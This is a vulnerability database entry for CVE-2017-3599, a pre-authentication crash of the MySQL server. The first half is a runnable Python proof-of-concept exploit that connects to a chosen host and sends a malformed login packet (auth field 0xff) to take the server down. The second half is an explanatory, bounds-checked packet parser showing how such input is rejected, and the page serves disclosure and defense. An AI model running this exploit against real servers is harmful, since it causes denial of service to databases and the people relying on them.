Pre-Auth MySQL remote DOS (Integer Overflow)(CVE-2017-3599)

19 Apr 2017 00:00:00 · Reported by Root · Type: seebug · Source: www.seebug.org · 181 views

A remote, pre-authentication denial of service against the MySQL server (CVE-2017-3599): a malformed login packet sent during the authentication handshake crashes the server. Updating to a fixed release is recommended.

Code

import socket
import sys
from struct import pack

'''
CVE-2017-3599 Proof of Concept exploit code.
https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/
Rodrigo Marcos
(Ported here from Python 2 to Python 3: bytes literals, print(), explicit byte order.)
'''

if len(sys.argv) < 2:
    print("Usage: python " + sys.argv[0] + " host [port]")
    sys.exit(0)

HOST = sys.argv[1]
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 3306  # no error checking, as in the original

print("[+] Creating packet...")

'''
MySQL packet header:
3 bytes     packet length (little-endian)
1 byte      packet (sequence) number

Login request, packet format when the server is 4.1 or newer:
Bytes       Content
-----       -------
4           client capabilities
4           max packet size
1           charset number
23          reserved (always 0)
n           user name, \0-terminated
n           plugin auth data (e.g. scramble), length encoded
n           database name, \0-terminated
            (if CLIENT_CONNECT_WITH_DB is set in the capabilities)
n           client auth plugin name, \0-terminated string
            (if CLIENT_PLUGIN_AUTH is set in the capabilities)
'''

packet_num = b'\x01'                # sequence id 1: the server's greeting was packet 0

# Login request packet
packet_cap  = b'\x85\xa2\xbf\x01'   # client capabilities (default)
packet_max  = b'\x00\x00\x00\x01'   # max packet size (default, 16 MiB little-endian)
packet_cset = b'\x21'               # charset (default, collation id 33 = utf8_general_ci)
p_reserved  = b'\x00' * 23          # 23 reserved bytes, all null (default)
packet_usr  = b'test\x00'           # username, null terminated (default)

packet_auth = b'\xff'               # both \xff and \xfe crash the server

'''
Conditions to crash:
1 - packet_auth must start with \xff or \xfe
2 - packet_auth must be shorter than 8 bytes
The expected value is the password, which can be in two different formats
(null terminated or length encoded) depending on the client capabilities.
'''

packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth
packet_len = pack('<I', len(packet))[:3]   # 3-byte little-endian length (explicit, not native, byte order)

request = packet_len + packet_num + packet

print("[+] Connecting to host...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((HOST, PORT))
    print("[+] Connected.")
except OSError:
    print("[+] Unable to connect to host " + HOST + " on port " + str(PORT) + ".")
    s.close()
    print("[+] Exiting.")
    sys.exit(0)

print("[+] Receiving greeting from remote host...")
data = s.recv(1024)   # the server speaks first (Initial Handshake packet)
print("[+] Done.")

print("[+] Sending our payload...")
s.sendall(request)
print("[+] Done.")
# print("Our data: %r" % request)

s.close()
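The crash conditions in the PoC (an auth field beginning with 0xff or 0xfe and shorter than 8 bytes) only make sense against the MySQL length-encoded integer rules: a first byte below 0xfb is the value itself, 0xfc, 0xfd and 0xfe announce 2, 3 or 8 further little-endian length bytes, and 0xfb and 0xff never start a length. A lone 0xfe therefore promises eight bytes the packet does not contain, and 0xff is not a length at all. The block below is an added example, not code from the PoC author, the Seebug entry or the MySQL project: it builds the same HandshakeResponse41 body the PoC sends and then parses it with a reader that checks every declared length against the bytes actually remaining, which is the check a server must make before trusting the field. The capability constants are protocol values; the parser structure and its error messages are this example's own, and the POC_BODY and TRUNCATED_FE_BODY byte strings are constructed here to mirror the PoC.

```python
import struct

# Capability bits from the MySQL client/server protocol; 0x01bfa285 is the
# default the PoC sends (little-endian bytes 85 a2 bf 01).
CLIENT_CONNECT_WITH_DB = 0x00000008
CLIENT_PLUGIN_AUTH = 0x00080000
CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA = 0x00200000


class MalformedPacket(ValueError):
    """A field claims more bytes than the packet contains (illustrative type)."""


def encode_lenenc_int(n):
    """Length-encoded integer: 1 byte below 0xfb, else a prefix plus 2/3/8 LE bytes."""
    if n < 0xfb:
        return bytes([n])
    if n < 0x10000:
        return b'\xfc' + struct.pack('<H', n)
    if n < 0x1000000:
        return b'\xfd' + struct.pack('<I', n)[:3]
    return b'\xfe' + struct.pack('<Q', n)


def decode_lenenc_int(buf, pos):
    """Return (value, next_pos); refuse prefixes whose length bytes are missing."""
    if pos >= len(buf):
        raise MalformedPacket('no byte left for the length prefix')
    first = buf[pos]
    pos += 1
    if first < 0xfb:
        return first, pos
    width = {0xfc: 2, 0xfd: 3, 0xfe: 8}.get(first)
    if width is None:  # 0xfb (NULL) and 0xff (error marker) never start a length
        raise MalformedPacket('0x%02x is not a valid length prefix' % first)
    if len(buf) - pos < width:
        raise MalformedPacket('prefix 0x%02x needs %d bytes, only %d remain'
                              % (first, width, len(buf) - pos))
    raw = buf[pos:pos + width].ljust(8, b'\x00')
    return struct.unpack('<Q', raw)[0], pos + width


def decode_lenenc_str(buf, pos):
    """Length-encoded string: the declared length must also fit in the buffer."""
    n, pos = decode_lenenc_int(buf, pos)
    if len(buf) - pos < n:
        raise MalformedPacket('string claims %d bytes, only %d remain' % (n, len(buf) - pos))
    return buf[pos:pos + n], pos + n


def read_cstring(buf, pos):
    end = buf.find(b'\x00', pos)
    if end < 0:
        raise MalformedPacket('unterminated string')
    return buf[pos:end], end + 1


def build_handshake_response(user, auth_data, caps=0x01bfa285, max_packet=0x01000000,
                             charset=0x21, database=None, plugin=b'mysql_native_password'):
    """HandshakeResponse41 body (no 4-byte frame header); auth_data is the scramble reply."""
    body = struct.pack('<IIB', caps, max_packet, charset) + b'\x00' * 23 + user + b'\x00'
    if caps & CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA:
        body += encode_lenenc_int(len(auth_data)) + auth_data
    else:
        body += bytes([len(auth_data)]) + auth_data  # 1-byte length form
    if caps & CLIENT_CONNECT_WITH_DB:
        body += (database or b'') + b'\x00'
    if caps & CLIENT_PLUGIN_AUTH:
        body += plugin + b'\x00'
    return body


def parse_handshake_response(body):
    """Bounds-checked parse; every length is validated against the bytes remaining."""
    if len(body) < 32:
        raise MalformedPacket('fixed header needs 32 bytes, got %d' % len(body))
    caps, max_packet, charset = struct.unpack_from('<IIB', body, 0)
    pos = 32
    user, pos = read_cstring(body, pos)
    if caps & CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA:
        auth_data, pos = decode_lenenc_str(body, pos)
    else:
        if pos >= len(body):
            raise MalformedPacket('missing auth length byte')
        n, pos = body[pos], pos + 1
        if len(body) - pos < n:
            raise MalformedPacket('auth data claims %d bytes, only %d remain' % (n, len(body) - pos))
        auth_data, pos = body[pos:pos + n], pos + n
    database = plugin = None
    if caps & CLIENT_CONNECT_WITH_DB:
        database, pos = read_cstring(body, pos)
    if caps & CLIENT_PLUGIN_AUTH:
        plugin, pos = read_cstring(body, pos)
    return {'caps': caps, 'max_packet': max_packet, 'charset': charset, 'user': user,
            'auth_data': auth_data, 'database': database, 'plugin': plugin}


def frame(body, seq=1):
    """Prepend the 3-byte little-endian length and 1-byte sequence id."""
    if len(body) >= 1 << 24:
        raise ValueError('body too large for a single packet')
    return struct.pack('<I', len(body))[:3] + bytes([seq]) + body


# Constructed inputs: the PoC's body (auth field is a lone 0xff) and a variant whose
# 0xfe prefix promises 8 length bytes but supplies 3.
POC_BODY = (struct.pack('<IIB', 0x01bfa285, 0x01000000, 0x21) + b'\x00' * 23
            + b'test\x00' + b'\xff')
TRUNCATED_FE_BODY = POC_BODY[:-1] + b'\xfe\x01\x02\x03'


def classify(body):
    """'ok' if the body parses, otherwise the parser's complaint."""
    try:
        parse_handshake_response(body)
        return 'ok'
    except MalformedPacket as exc:
        return 'malformed: %s' % exc


if __name__ == '__main__':
    print(classify(build_handshake_response(b'test', b'\x11' * 20)))  # ok
    print(classify(POC_BODY))           # malformed: 0xff is not a valid length prefix
    print(classify(TRUNCATED_FE_BODY))  # malformed: prefix 0xfe needs 8 bytes, only 3 remain
    print(frame(POC_BODY)[:4].hex())    # 26000001
```

The same check catches the other dangerous shape, a well-formed 0xfe prefix whose eight bytes declare a length far larger than the packet (for example 2^40): decode_lenenc_str compares that declared length with the bytes remaining before slicing, so no read ever runs past the buffer. Note that frame() rejects bodies of 16 MiB or more; the real protocol splits such payloads across several packets, which this example does not implement.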


Vulners AI Score: 8.3 (High risk) · EPSS: 0.89924